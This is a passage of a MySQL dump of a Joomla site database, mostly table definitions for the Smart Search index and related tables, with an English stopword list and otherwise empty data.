--

LOCK TABLES `j25_fields_groups` WRITE;
/*!40000 ALTER TABLE `j25_fields_groups` DISABLE KEYS */;
/*!40000 ALTER TABLE `j25_fields_groups` ENABLE KEYS */;
UNLOCK TABLES;

--
-- Table structure for table `j25_fields_values`
--

DROP TABLE IF EXISTS `j25_fields_values`;
/*!40101 SET @saved_cs_client     = @@character_set_client */;
/*!40101 SET character_set_client = utf8 */;
CREATE TABLE `j25_fields_values` (
  `field_id` int(10) unsigned NOT NULL,
  `item_id` varchar(255) COLLATE utf8mb4_unicode_ci NOT NULL COMMENT 'Allow references to items which have strings as ids, eg. none db systems.',
  `value` text COLLATE utf8mb4_unicode_ci,
  KEY `idx_field_id` (`field_id`),
  KEY `idx_item_id` (`item_id`(191))
) ENGINE=InnoDB DEFAULT CHARSET=utf8mb4 COLLATE=utf8mb4_unicode_ci;
/*!40101 SET character_set_client = @saved_cs_client */;

--
-- Dumping data for table `j25_fields_values`
--

LOCK TABLES `j25_fields_values` WRITE;
/*!40000 ALTER TABLE `j25_fields_values` DISABLE KEYS */;
/*!40000 ALTER TABLE `j25_fields_values` ENABLE KEYS */;
UNLOCK TABLES;

--
-- Table structure for table `j25_finder_filters`
--

DROP TABLE IF EXISTS `j25_finder_filters`;
/*!40101 SET @saved_cs_client     = @@character_set_client */;
/*!40101 SET character_set_client = utf8 */;
CREATE TABLE `j25_finder_filters` (
  `filter_id` int(10) unsigned NOT NULL AUTO_INCREMENT,
  `title` varchar(255) NOT NULL,
  `alias` varchar(255) NOT NULL,
  `state` tinyint(1) NOT NULL DEFAULT '1',
  `created` datetime NOT NULL DEFAULT '0000-00-00 00:00:00',
  `created_by` int(10) unsigned NOT NULL,
  `created_by_alias` varchar(255) NOT NULL,
  `modified` datetime NOT NULL DEFAULT '0000-00-00 00:00:00',
  `modified_by` int(10) unsigned NOT NULL DEFAULT '0',
  `checked_out` int(10) unsigned NOT NULL DEFAULT '0',
  `checked_out_time` datetime NOT NULL DEFAULT '0000-00-00 00:00:00',
  `map_count` int(10) unsigned NOT NULL DEFAULT '0',
  `data` mediumtext NOT NULL,
  `params` longtext,
  PRIMARY KEY (`filter_id`)
) ENGINE=InnoDB DEFAULT CHARSET=utf8mb4;
/*!40101 SET character_set_client = @saved_cs_client */;

--
-- Dumping data for table `j25_finder_filters`
--

LOCK TABLES `j25_finder_filters` WRITE;
/*!40000 ALTER TABLE `j25_finder_filters` DISABLE KEYS */;
/*!40000 ALTER TABLE `j25_finder_filters` ENABLE KEYS */;
UNLOCK TABLES;

--
-- Table structure for table `j25_finder_links`
--

DROP TABLE IF EXISTS `j25_finder_links`;
/*!40101 SET @saved_cs_client     = @@character_set_client */;
/*!40101 SET character_set_client = utf8 */;
CREATE TABLE `j25_finder_links` (
  `link_id` int(10) unsigned NOT NULL AUTO_INCREMENT,
  `url` varchar(255) NOT NULL,
  `route` varchar(255) NOT NULL,
  `title` varchar(400) DEFAULT NULL,
  `description` text,
  `indexdate` datetime NOT NULL DEFAULT '0000-00-00 00:00:00',
  `md5sum` varchar(32) DEFAULT NULL,
  `published` tinyint(1) NOT NULL DEFAULT '1',
  `state` int(5) DEFAULT '1',
  `access` int(5) DEFAULT '0',
  `language` varchar(8) NOT NULL,
  `publish_start_date` datetime NOT NULL DEFAULT '0000-00-00 00:00:00',
  `publish_end_date` datetime NOT NULL DEFAULT '0000-00-00 00:00:00',
  `start_date` datetime NOT NULL DEFAULT '0000-00-00 00:00:00',
  `end_date` datetime NOT NULL DEFAULT '0000-00-00 00:00:00',
  `list_price` double unsigned NOT NULL DEFAULT '0',
  `sale_price` double unsigned NOT NULL DEFAULT '0',
  `type_id` int(11) NOT NULL,
  `object` mediumblob NOT NULL,
  PRIMARY KEY (`link_id`),
  KEY `idx_type` (`type_id`),
  KEY `idx_md5` (`md5sum`),
  KEY `idx_url` (`url`(75)),
  KEY `idx_published_list` (`published`,`state`,`access`,`publish_start_date`,`publish_end_date`,`list_price`),
  KEY `idx_published_sale` (`published`,`state`,`access`,`publish_start_date`,`publish_end_date`,`sale_price`),
  KEY `idx_title` (`title`(100))
) ENGINE=InnoDB DEFAULT CHARSET=utf8mb4;
/*!40101 SET character_set_client = @saved_cs_client */;

--
-- Dumping data for table `j25_finder_links`
--

LOCK TABLES `j25_finder_links` WRITE;
/*!40000 ALTER TABLE `j25_finder_links` DISABLE KEYS */;
/*!40000 ALTER TABLE `j25_finder_links` ENABLE KEYS */;
UNLOCK TABLES;

--
-- Table structure for table `j25_finder_links_terms0`
--

DROP TABLE IF EXISTS `j25_finder_links_terms0`;
/*!40101 SET @saved_cs_client     = @@character_set_client */;
/*!40101 SET character_set_client = utf8 */;
CREATE TABLE `j25_finder_links_terms0` (
  `link_id` int(10) unsigned NOT NULL,
  `term_id` int(10) unsigned NOT NULL,
  `weight` float unsigned NOT NULL,
  PRIMARY KEY (`link_id`,`term_id`),
  KEY `idx_term_weight` (`term_id`,`weight`),
  KEY `idx_link_term_weight` (`link_id`,`term_id`,`weight`)
) ENGINE=InnoDB DEFAULT CHARSET=utf8mb4;
/*!40101 SET character_set_client = @saved_cs_client */;

--
-- Dumping data for table `j25_finder_links_terms0`
--

LOCK TABLES `j25_finder_links_terms0` WRITE;
/*!40000 ALTER TABLE `j25_finder_links_terms0` DISABLE KEYS */;
/*!40000 ALTER TABLE `j25_finder_links_terms0` ENABLE KEYS */;
UNLOCK TABLES;

--
-- Table structure for table `j25_finder_links_terms1`
--

DROP TABLE IF EXISTS `j25_finder_links_terms1`;
/*!40101 SET @saved_cs_client     = @@character_set_client */;
/*!40101 SET character_set_client = utf8 */;
CREATE TABLE `j25_finder_links_terms1` (
  `link_id` int(10) unsigned NOT NULL,
  `term_id` int(10) unsigned NOT NULL,
  `weight` float unsigned NOT NULL,
  PRIMARY KEY (`link_id`,`term_id`),
  KEY `idx_term_weight` (`term_id`,`weight`),
  KEY `idx_link_term_weight` (`link_id`,`term_id`,`weight`)
) ENGINE=InnoDB DEFAULT CHARSET=utf8mb4;
/*!40101 SET character_set_client = @saved_cs_client */;

--
-- Dumping data for table `j25_finder_links_terms1`
--

LOCK TABLES `j25_finder_links_terms1` WRITE;
/*!40000 ALTER TABLE `j25_finder_links_terms1` DISABLE KEYS */;
/*!40000 ALTER TABLE `j25_finder_links_terms1` ENABLE KEYS */;
UNLOCK TABLES;

--
-- Table structure for table `j25_finder_links_terms2`
--

DROP TABLE IF EXISTS `j25_finder_links_terms2`;
/*!40101 SET @saved_cs_client     = @@character_set_client */;
/*!40101 SET character_set_client = utf8 */;
CREATE TABLE `j25_finder_links_terms2` (
  `link_id` int(10) unsigned NOT NULL,
  `term_id` int(10) unsigned NOT NULL,
  `weight` float unsigned NOT NULL,
  PRIMARY KEY (`link_id`,`term_id`),
  KEY `idx_term_weight` (`term_id`,`weight`),
  KEY `idx_link_term_weight` (`link_id`,`term_id`,`weight`)
) ENGINE=InnoDB DEFAULT CHARSET=utf8mb4;
/*!40101 SET character_set_client = @saved_cs_client */;

--
-- Dumping data for table `j25_finder_links_terms2`
--

LOCK TABLES `j25_finder_links_terms2` WRITE;
/*!40000 ALTER TABLE `j25_finder_links_terms2` DISABLE KEYS */;
/*!40000 ALTER TABLE `j25_finder_links_terms2` ENABLE KEYS */;
UNLOCK TABLES;

--
-- Table structure for table `j25_finder_links_terms3`
--

DROP TABLE IF EXISTS `j25_finder_links_terms3`;
/*!40101 SET @saved_cs_client     = @@character_set_client */;
/*!40101 SET character_set_client = utf8 */;
CREATE TABLE `j25_finder_links_terms3` (
  `link_id` int(10) unsigned NOT NULL,
  `term_id` int(10) unsigned NOT NULL,
  `weight` float unsigned NOT NULL,
  PRIMARY KEY (`link_id`,`term_id`),
  KEY `idx_term_weight` (`term_id`,`weight`),
  KEY `idx_link_term_weight` (`link_id`,`term_id`,`weight`)
) ENGINE=InnoDB DEFAULT CHARSET=utf8mb4;
/*!40101 SET character_set_client = @saved_cs_client */;

--
-- Dumping data for table `j25_finder_links_terms3`
--

LOCK TABLES `j25_finder_links_terms3` WRITE;
/*!40000 ALTER TABLE `j25_finder_links_terms3` DISABLE KEYS */;
/*!40000 ALTER TABLE `j25_finder_links_terms3` ENABLE KEYS */;
UNLOCK TABLES;

--
-- Table structure for table `j25_finder_links_terms4`
--

DROP TABLE IF EXISTS `j25_finder_links_terms4`;
/*!40101 SET @saved_cs_client     = @@character_set_client */;
/*!40101 SET character_set_client = utf8 */;
CREATE TABLE `j25_finder_links_terms4` (
  `link_id` int(10) unsigned NOT NULL,
  `term_id` int(10) unsigned NOT NULL,
  `weight` float unsigned NOT NULL,
  PRIMARY KEY (`link_id`,`term_id`),
  KEY `idx_term_weight` (`term_id`,`weight`),
  KEY `idx_link_term_weight` (`link_id`,`term_id`,`weight`)
) ENGINE=InnoDB DEFAULT CHARSET=utf8mb4;
/*!40101 SET character_set_client = @saved_cs_client */;

--
-- Dumping data for table `j25_finder_links_terms4`
--

LOCK TABLES `j25_finder_links_terms4` WRITE;
/*!40000 ALTER TABLE `j25_finder_links_terms4` DISABLE KEYS */;
/*!40000 ALTER TABLE `j25_finder_links_terms4` ENABLE KEYS */;
UNLOCK TABLES;

--
-- Table structure for table `j25_finder_links_terms5`
--

DROP TABLE IF EXISTS `j25_finder_links_terms5`;
/*!40101 SET @saved_cs_client     = @@character_set_client */;
/*!40101 SET character_set_client = utf8 */;
CREATE TABLE `j25_finder_links_terms5` (
  `link_id` int(10) unsigned NOT NULL,
  `term_id` int(10) unsigned NOT NULL,
  `weight` float unsigned NOT NULL,
  PRIMARY KEY (`link_id`,`term_id`),
  KEY `idx_term_weight` (`term_id`,`weight`),
  KEY `idx_link_term_weight` (`link_id`,`term_id`,`weight`)
) ENGINE=InnoDB DEFAULT CHARSET=utf8mb4;
/*!40101 SET character_set_client = @saved_cs_client */;

--
-- Dumping data for table `j25_finder_links_terms5`
--

LOCK TABLES `j25_finder_links_terms5` WRITE;
/*!40000 ALTER TABLE `j25_finder_links_terms5` DISABLE KEYS */;
/*!40000 ALTER TABLE `j25_finder_links_terms5` ENABLE KEYS */;
UNLOCK TABLES;

--
-- Table structure for table `j25_finder_links_terms6`
--

DROP TABLE IF EXISTS `j25_finder_links_terms6`;
/*!40101 SET @saved_cs_client     = @@character_set_client */;
/*!40101 SET character_set_client = utf8 */;
CREATE TABLE `j25_finder_links_terms6` (
  `link_id` int(10) unsigned NOT NULL,
  `term_id` int(10) unsigned NOT NULL,
  `weight` float unsigned NOT NULL,
  PRIMARY KEY (`link_id`,`term_id`),
  KEY `idx_term_weight` (`term_id`,`weight`),
  KEY `idx_link_term_weight` (`link_id`,`term_id`,`weight`)
) ENGINE=InnoDB DEFAULT CHARSET=utf8mb4;
/*!40101 SET character_set_client = @saved_cs_client */;

--
-- Dumping data for table `j25_finder_links_terms6`
--

LOCK TABLES `j25_finder_links_terms6` WRITE;
/*!40000 ALTER TABLE `j25_finder_links_terms6` DISABLE KEYS */;
/*!40000 ALTER TABLE `j25_finder_links_terms6` ENABLE KEYS */;
UNLOCK TABLES;

--
-- Table structure for table `j25_finder_links_terms7`
--

DROP TABLE IF EXISTS `j25_finder_links_terms7`;
/*!40101 SET @saved_cs_client     = @@character_set_client */;
/*!40101 SET character_set_client = utf8 */;
CREATE TABLE `j25_finder_links_terms7` (
  `link_id` int(10) unsigned NOT NULL,
  `term_id` int(10) unsigned NOT NULL,
  `weight` float unsigned NOT NULL,
  PRIMARY KEY (`link_id`,`term_id`),
  KEY `idx_term_weight` (`term_id`,`weight`),
  KEY `idx_link_term_weight` (`link_id`,`term_id`,`weight`)
) ENGINE=InnoDB DEFAULT CHARSET=utf8mb4;
/*!40101 SET character_set_client = @saved_cs_client */;

--
-- Dumping data for table `j25_finder_links_terms7`
--

LOCK TABLES `j25_finder_links_terms7` WRITE;
/*!40000 ALTER TABLE `j25_finder_links_terms7` DISABLE KEYS */;
/*!40000 ALTER TABLE `j25_finder_links_terms7` ENABLE KEYS */;
UNLOCK TABLES;

--
-- Table structure for table `j25_finder_links_terms8`
--

DROP TABLE IF EXISTS `j25_finder_links_terms8`;
/*!40101 SET @saved_cs_client     = @@character_set_client */;
/*!40101 SET character_set_client = utf8 */;
CREATE TABLE `j25_finder_links_terms8` (
  `link_id` int(10) unsigned NOT NULL,
  `term_id` int(10) unsigned NOT NULL,
  `weight` float unsigned NOT NULL,
  PRIMARY KEY (`link_id`,`term_id`),
  KEY `idx_term_weight` (`term_id`,`weight`),
  KEY `idx_link_term_weight` (`link_id`,`term_id`,`weight`)
) ENGINE=InnoDB DEFAULT CHARSET=utf8mb4;
/*!40101 SET character_set_client = @saved_cs_client */;

--
-- Dumping data for table `j25_finder_links_terms8`
--

LOCK TABLES `j25_finder_links_terms8` WRITE;
/*!40000 ALTER TABLE `j25_finder_links_terms8` DISABLE KEYS */;
/*!40000 ALTER TABLE `j25_finder_links_terms8` ENABLE KEYS */;
UNLOCK TABLES;

--
-- Table structure for table `j25_finder_links_terms9`
--

DROP TABLE IF EXISTS `j25_finder_links_terms9`;
/*!40101 SET @saved_cs_client     = @@character_set_client */;
/*!40101 SET character_set_client = utf8 */;
CREATE TABLE `j25_finder_links_terms9` (
  `link_id` int(10) unsigned NOT NULL,
  `term_id` int(10) unsigned NOT NULL,
  `weight` float unsigned NOT NULL,
  PRIMARY KEY (`link_id`,`term_id`),
  KEY `idx_term_weight` (`term_id`,`weight`),
  KEY `idx_link_term_weight` (`link_id`,`term_id`,`weight`)
) ENGINE=InnoDB DEFAULT CHARSET=utf8mb4;
/*!40101 SET character_set_client = @saved_cs_client */;

--
-- Dumping data for table `j25_finder_links_terms9`
--

LOCK TABLES `j25_finder_links_terms9` WRITE;
/*!40000 ALTER TABLE `j25_finder_links_terms9` DISABLE KEYS */;
/*!40000 ALTER TABLE `j25_finder_links_terms9` ENABLE KEYS */;
UNLOCK TABLES;

--
-- Table structure for table `j25_finder_links_termsa`
--

DROP TABLE IF EXISTS `j25_finder_links_termsa`;
/*!40101 SET @saved_cs_client     = @@character_set_client */;
/*!40101 SET character_set_client = utf8 */;
CREATE TABLE `j25_finder_links_termsa` (
  `link_id` int(10) unsigned NOT NULL,
  `term_id` int(10) unsigned NOT NULL,
  `weight` float unsigned NOT NULL,
  PRIMARY KEY (`link_id`,`term_id`),
  KEY `idx_term_weight` (`term_id`,`weight`),
  KEY `idx_link_term_weight` (`link_id`,`term_id`,`weight`)
) ENGINE=InnoDB DEFAULT CHARSET=utf8mb4;
/*!40101 SET character_set_client = @saved_cs_client */;

--
-- Dumping data for table `j25_finder_links_termsa`
--

LOCK TABLES `j25_finder_links_termsa` WRITE;
/*!40000 ALTER TABLE `j25_finder_links_termsa` DISABLE KEYS */;
/*!40000 ALTER TABLE `j25_finder_links_termsa` ENABLE KEYS */;
UNLOCK TABLES;

--
-- Table structure for table `j25_finder_links_termsb`
--

DROP TABLE IF EXISTS `j25_finder_links_termsb`;
/*!40101 SET @saved_cs_client     = @@character_set_client */;
/*!40101 SET character_set_client = utf8 */;
CREATE TABLE `j25_finder_links_termsb` (
  `link_id` int(10) unsigned NOT NULL,
  `term_id` int(10) unsigned NOT NULL,
  `weight` float unsigned NOT NULL,
  PRIMARY KEY (`link_id`,`term_id`),
  KEY `idx_term_weight` (`term_id`,`weight`),
  KEY `idx_link_term_weight` (`link_id`,`term_id`,`weight`)
) ENGINE=InnoDB DEFAULT CHARSET=utf8mb4;
/*!40101 SET character_set_client = @saved_cs_client */;

--
-- Dumping data for table `j25_finder_links_termsb`
--

LOCK TABLES `j25_finder_links_termsb` WRITE;
/*!40000 ALTER TABLE `j25_finder_links_termsb` DISABLE KEYS */;
/*!40000 ALTER TABLE `j25_finder_links_termsb` ENABLE KEYS */;
UNLOCK TABLES;

--
-- Table structure for table `j25_finder_links_termsc`
--

DROP TABLE IF EXISTS `j25_finder_links_termsc`;
/*!40101 SET @saved_cs_client     = @@character_set_client */;
/*!40101 SET character_set_client = utf8 */;
CREATE TABLE `j25_finder_links_termsc` (
  `link_id` int(10) unsigned NOT NULL,
  `term_id` int(10) unsigned NOT NULL,
  `weight` float unsigned NOT NULL,
  PRIMARY KEY (`link_id`,`term_id`),
  KEY `idx_term_weight` (`term_id`,`weight`),
  KEY `idx_link_term_weight` (`link_id`,`term_id`,`weight`)
) ENGINE=InnoDB DEFAULT CHARSET=utf8mb4;
/*!40101 SET character_set_client = @saved_cs_client */;

--
-- Dumping data for table `j25_finder_links_termsc`
--

LOCK TABLES `j25_finder_links_termsc` WRITE;
/*!40000 ALTER TABLE `j25_finder_links_termsc` DISABLE KEYS */;
/*!40000 ALTER TABLE `j25_finder_links_termsc` ENABLE KEYS */;
UNLOCK TABLES;

--
-- Table structure for table `j25_finder_links_termsd`
--

DROP TABLE IF EXISTS `j25_finder_links_termsd`;
/*!40101 SET @saved_cs_client     = @@character_set_client */;
/*!40101 SET character_set_client = utf8 */;
CREATE TABLE `j25_finder_links_termsd` (
  `link_id` int(10) unsigned NOT NULL,
  `term_id` int(10) unsigned NOT NULL,
  `weight` float unsigned NOT NULL,
  PRIMARY KEY (`link_id`,`term_id`),
  KEY `idx_term_weight` (`term_id`,`weight`),
  KEY `idx_link_term_weight` (`link_id`,`term_id`,`weight`)
) ENGINE=InnoDB DEFAULT CHARSET=utf8mb4;
/*!40101 SET character_set_client = @saved_cs_client */;

--
-- Dumping data for table `j25_finder_links_termsd`
--

LOCK TABLES `j25_finder_links_termsd` WRITE;
/*!40000 ALTER TABLE `j25_finder_links_termsd` DISABLE KEYS */;
/*!40000 ALTER TABLE `j25_finder_links_termsd` ENABLE KEYS */;
UNLOCK TABLES;

--
-- Table structure for table `j25_finder_links_termse`
--

DROP TABLE IF EXISTS `j25_finder_links_termse`;
/*!40101 SET @saved_cs_client     = @@character_set_client */;
/*!40101 SET character_set_client = utf8 */;
CREATE TABLE `j25_finder_links_termse` (
  `link_id` int(10) unsigned NOT NULL,
  `term_id` int(10) unsigned NOT NULL,
  `weight` float unsigned NOT NULL,
  PRIMARY KEY (`link_id`,`term_id`),
  KEY `idx_term_weight` (`term_id`,`weight`),
  KEY `idx_link_term_weight` (`link_id`,`term_id`,`weight`)
) ENGINE=InnoDB DEFAULT CHARSET=utf8mb4;
/*!40101 SET character_set_client = @saved_cs_client */;

--
-- Dumping data for table `j25_finder_links_termse`
--

LOCK TABLES `j25_finder_links_termse` WRITE;
/*!40000 ALTER TABLE `j25_finder_links_termse` DISABLE KEYS */;
/*!40000 ALTER TABLE `j25_finder_links_termse` ENABLE KEYS */;
UNLOCK TABLES;

--
-- Table structure for table `j25_finder_links_termsf`
--

DROP TABLE IF EXISTS `j25_finder_links_termsf`;
/*!40101 SET @saved_cs_client     = @@character_set_client */;
/*!40101 SET character_set_client = utf8 */;
CREATE TABLE `j25_finder_links_termsf` (
  `link_id` int(10) unsigned NOT NULL,
  `term_id` int(10) unsigned NOT NULL,
  `weight` float unsigned NOT NULL,
  PRIMARY KEY (`link_id`,`term_id`),
  KEY `idx_term_weight` (`term_id`,`weight`),
  KEY `idx_link_term_weight` (`link_id`,`term_id`,`weight`)
) ENGINE=InnoDB DEFAULT CHARSET=utf8mb4;
/*!40101 SET character_set_client = @saved_cs_client */;

--
-- Dumping data for table `j25_finder_links_termsf`
--

LOCK TABLES `j25_finder_links_termsf` WRITE;
/*!40000 ALTER TABLE `j25_finder_links_termsf` DISABLE KEYS */;
/*!40000 ALTER TABLE `j25_finder_links_termsf` ENABLE KEYS */;
UNLOCK TABLES;

--
-- Table structure for table `j25_finder_taxonomy`
--

DROP TABLE IF EXISTS `j25_finder_taxonomy`;
/*!40101 SET @saved_cs_client     = @@character_set_client */;
/*!40101 SET character_set_client = utf8 */;
CREATE TABLE `j25_finder_taxonomy` (
  `id` int(10) unsigned NOT NULL AUTO_INCREMENT,
  `parent_id` int(10) unsigned NOT NULL DEFAULT '0',
  `title` varchar(255) NOT NULL,
  `state` tinyint(1) unsigned NOT NULL DEFAULT '1',
  `access` tinyint(1) unsigned NOT NULL DEFAULT '0',
  `ordering` tinyint(1) unsigned NOT NULL DEFAULT '0',
  PRIMARY KEY (`id`),
  KEY `parent_id` (`parent_id`),
  KEY `state` (`state`),
  KEY `ordering` (`ordering`),
  KEY `access` (`access`),
  KEY `idx_parent_published` (`parent_id`,`state`,`access`)
) ENGINE=InnoDB AUTO_INCREMENT=2 DEFAULT CHARSET=utf8mb4;
/*!40101 SET character_set_client = @saved_cs_client */;

--
-- Dumping data for table `j25_finder_taxonomy`
--

LOCK TABLES `j25_finder_taxonomy` WRITE;
/*!40000 ALTER TABLE `j25_finder_taxonomy` DISABLE KEYS */;
INSERT INTO `j25_finder_taxonomy` VALUES (1,0,'ROOT',0,0,0);
/*!40000 ALTER TABLE `j25_finder_taxonomy` ENABLE KEYS */;
UNLOCK TABLES;

--
-- Table structure for table `j25_finder_taxonomy_map`
--

DROP TABLE IF EXISTS `j25_finder_taxonomy_map`;
/*!40101 SET @saved_cs_client     = @@character_set_client */;
/*!40101 SET character_set_client = utf8 */;
CREATE TABLE `j25_finder_taxonomy_map` (
  `link_id` int(10) unsigned NOT NULL,
  `node_id` int(10) unsigned NOT NULL,
  PRIMARY KEY (`link_id`,`node_id`),
  KEY `link_id` (`link_id`),
  KEY `node_id` (`node_id`)
) ENGINE=InnoDB DEFAULT CHARSET=utf8mb4;
/*!40101 SET character_set_client = @saved_cs_client */;

--
-- Dumping data for table `j25_finder_taxonomy_map`
--

LOCK TABLES `j25_finder_taxonomy_map` WRITE;
/*!40000 ALTER TABLE `j25_finder_taxonomy_map` DISABLE KEYS */;
/*!40000 ALTER TABLE `j25_finder_taxonomy_map` ENABLE KEYS */;
UNLOCK TABLES;

--
-- Table structure for table `j25_finder_terms`
--

DROP TABLE IF EXISTS `j25_finder_terms`;
/*!40101 SET @saved_cs_client     = @@character_set_client */;
/*!40101 SET character_set_client = utf8 */;
CREATE TABLE `j25_finder_terms` (
  `term_id` int(10) unsigned NOT NULL AUTO_INCREMENT,
  `term` varchar(75) NOT NULL,
  `stem` varchar(75) NOT NULL,
  `common` tinyint(1) unsigned NOT NULL DEFAULT '0',
  `phrase` tinyint(1) unsigned NOT NULL DEFAULT '0',
  `weight` float unsigned NOT NULL DEFAULT '0',
  `soundex` varchar(75) NOT NULL,
  `links` int(10) NOT NULL DEFAULT '0',
  `language` char(3) NOT NULL DEFAULT '',
  PRIMARY KEY (`term_id`),
  UNIQUE KEY `idx_term` (`term`),
  KEY `idx_term_phrase` (`term`,`phrase`),
  KEY `idx_stem_phrase` (`stem`,`phrase`),
  KEY `idx_soundex_phrase` (`soundex`,`phrase`)
) ENGINE=InnoDB DEFAULT CHARSET=utf8mb4;
/*!40101 SET character_set_client = @saved_cs_client */;

--
-- Dumping data for table `j25_finder_terms`
--

LOCK TABLES `j25_finder_terms` WRITE;
/*!40000 ALTER TABLE `j25_finder_terms` DISABLE KEYS */;
/*!40000 ALTER TABLE `j25_finder_terms` ENABLE KEYS */;
UNLOCK TABLES;

--
-- Table structure for table `j25_finder_terms_common`
--

DROP TABLE IF EXISTS `j25_finder_terms_common`;
/*!40101 SET @saved_cs_client     = @@character_set_client */;
/*!40101 SET character_set_client = utf8 */;
CREATE TABLE `j25_finder_terms_common` (
  `term` varchar(75) NOT NULL,
  `language` varchar(3) NOT NULL,
  KEY `idx_word_lang` (`term`,`language`),
  KEY `idx_lang` (`language`)
) ENGINE=InnoDB DEFAULT CHARSET=utf8mb4;
/*!40101 SET character_set_client = @saved_cs_client */;

--
-- Dumping data for table `j25_finder_terms_common`
--

LOCK TABLES `j25_finder_terms_common` WRITE;
/*!40000 ALTER TABLE `j25_finder_terms_common` DISABLE KEYS */;
INSERT INTO `j25_finder_terms_common` VALUES ('a','en'),('about','en'),('after','en'),('ago','en'),('all','en'),('am','en'),('an','en'),('and','en'),('ani','en'),('any','en'),('are','en'),('aren\'t','en'),('as','en'),('at','en'),('be','en'),('but','en'),('by','en'),('for','en'),('from','en'),('get','en'),('go','en'),('how','en'),('if','en'),('in','en'),('into','en'),('is','en'),('isn\'t','en'),('it','en'),('its','en'),('me','en'),('more','en'),('most','en'),('must','en'),('my','en'),('new','en'),('no','en'),('none','en'),('not','en'),('noth','en'),('nothing','en'),('of','en'),('off','en'),('often','en'),('old','en'),('on','en'),('onc','en'),('once','en'),('onli','en'),('only','en'),('or','en'),('other','en'),('our','en'),('ours','en'),('out','en'),('over','en'),('page','en'),('she','en'),('should','en'),('small','en'),('so','en'),('some','en'),('than','en'),('thank','en'),('that','en'),('the','en'),('their','en'),('theirs','en'),('them','en'),('then','en'),('there','en'),('these','en'),('they','en'),('this','en'),('those','en'),('thus','en'),('time','en'),('times','en'),('to','en'),('too','en'),('true','en'),('under','en'),('until','en'),('up','en'),('upon','en'),('use','en'),('user','en'),('users','en'),('veri','en'),('version','en'),('very','en'),('via','en'),('want','en'),('was','en'),('way','en'),('were','en'),('what','en'),('when','en'),('where','en'),('whi','en'),('which','en'),('who','en'),('whom','en'),('whose','en'),('why','en'),('wide','en'),('will','en'),('with','en'),('within','en'),('without','en'),('would','en'),('yes','en'),('yet','en'),('you','en'),('your','en'),('yours','en');
/*!40000 ALTER TABLE `j25_finder_terms_common` ENABLE KEYS */;
UNLOCK TABLES;

--
-- Table structure for table `j25_finder_tokens`
--

DROP TABLE IF EXISTS `j25_finder_tokens`;
/*!40101 SET @saved_cs_client     = @@character_set_client */;
/*!40101 SET character_set_client = utf8 */;
CREATE TABLE `j25_finder_tokens` (
  `term` varchar(75) NOT NULL,
  `stem` varchar(75) NOT NULL,
  `common` tinyint(1) unsigned NOT NULL DEFAULT '0',
  `phrase` tinyint(1) unsigned NOT NULL DEFAULT '0',
  `weight` float unsigned NOT NULL DEFAULT '1',
  `context` tinyint(1) unsigned NOT NULL DEFAULT '2',
  `language` char(3) NOT NULL DEFAULT '',
  KEY `idx_word` (`term`),
  KEY `idx_context` (`context`)
) ENGINE=MEMORY DEFAULT CHARSET=utf8mb4;
/*!40101 SET character_set_client = @saved_cs_client */;

--
-- Dumping data for table `j25_finder_tokens`
--

LOCK TABLES `j25_finder_tokens` WRITE;
/*!40000 ALTER TABLE `j25_finder_tokens` DISABLE KEYS */;
/*!40000 ALTER TABLE `j25_finder_tokens` ENABLE KEYS */;
UNLOCK TABLES;

--
-- Table structure for table `j25_finder_tokens_aggregate`
--

DROP TABLE IF EXISTS `j25_finder_tokens_aggregate`;
/*!40101 SET @saved_cs_client     = @@character_set_client */;
/*!40101 SET character_set_client = utf8 */;
CREATE TABLE `j25_finder_tokens_aggregate` (
  `term_id` int(10) unsigned NOT NULL,
  `map_suffix` char(1) NOT NULL,
  `term` varchar(75) NOT NULL,
  `stem` varchar(75) NOT NULL,
  `common` tinyint(1) unsigned NOT NULL DEFAULT '0',
  `phrase` tinyint(1) unsigned NOT NULL DEFAULT '0',
  `term_weight` float unsigned NOT NULL,
  `context` tinyint(1) unsigned NOT NULL DEFAULT '2',
  `context_weight` float unsigned NOT NULL,
  `total_weight` float unsigned NOT NULL,
  `language` char(3) NOT NULL DEFAULT '',
  KEY `token` (`term`),
  KEY `keyword_id` (`term_id`)
) ENGINE=MEMORY DEFAULT CHARSET=utf8mb4;
/*!40101 SET character_set_client = @saved_cs_client */;

--
-- Dumping data for table `j25_finder_tokens_aggregate`
--

LOCK TABLES `j25_finder_tokens_aggregate` WRITE;
/*!40000 ALTER TABLE `j25_finder_tokens_aggregate` DISABLE KEYS */;
/*!40000 ALTER TABLE `j25_finder_tokens_aggregate` ENABLE KEYS */;
UNLOCK TABLES;

--
-- Table structure for table `j25_finder_types`
--

DROP TABLE IF EXISTS `j25_finder_types`;
/*!40101 SET @saved_cs_client     = @@character_set_client */;
/*!40101 SET character_set_client = utf8 */;
CREATE TABLE `j25_finder_types` (
  `id` int(10) unsigned NOT NULL AUTO_INCREMENT,
  `title` varchar(100) NOT NULL,
  `mime` varchar(100) NOT NULL,
  PRIMARY KEY (`id`),
  UNIQUE KEY `title` (`title`)
) ENGINE=InnoDB DEFAULT CHARSET=utf8mb4;
/*!40101 SET character_set_client = @saved_cs_client */;

--
-- Dumping data for table `j25_finder_types`
--

LOCK TABLES `j25_finder_types` WRITE;
/*!40000 ALTER TABLE `j25_finder_types` DISABLE KEYS */;
/*!40000 ALTER TABLE `j25_finder_types` ENABLE KEYS */;
UNLOCK TABLES;

--
-- Table structure for table `j25_fst_comments`
--

DROP TABLE IF EXISTS `j25_fst_comments`;
/*!40101 SET @saved_cs_client     = @@character_set_client */;
/*!40101 SET character_set_client = utf8 */;
CREATE TABLE `j25_fst_comments` (
  `id` int(10) unsigned NOT NULL AUTO_INCREMENT,
  `ident` int(11) NOT NULL,
  `itemid` int(10) unsigned NOT NULL,
  `name` varchar(250) DEFAULT NULL,
  `email` varchar(250) DEFAULT NULL,
  `website` varchar(250) DEFAULT NULL,
  `body` text,
  `created` datetime DEFAULT NULL,
  `published` tinyint(3) DEFAULT NULL,
  `userid` int(11) NOT NULL,
  `custom` text NOT NULL,
  PRIMARY KEY (`id`),
  KEY `jos_fss_kb_comment_FKIndex1` (`itemid`)
) ENGINE=MyISAM AUTO_INCREMENT=2 DEFAULT CHARSET=utf8;
/*!40101 SET character_set_client = @saved_cs_client */;

--
-- Dumping data for table `j25_fst_comments`
--

LOCK TABLES `j25_fst_comments` WRITE;
/*!40000 ALTER TABLE `j25_fst_comments` DISABLE KEYS */;
/*!40000 ALTER TABLE `j25_fst_comments` ENABLE KEYS */;
UNLOCK TABLES;

--
-- Table structure for table `j25_fst_data`
--

DROP TABLE IF EXISTS `j25_fst_data`;
/*!40101 SET @saved_cs_client     = @@character_set_client */;
/*!40101 SET character_set_client = utf8 */;
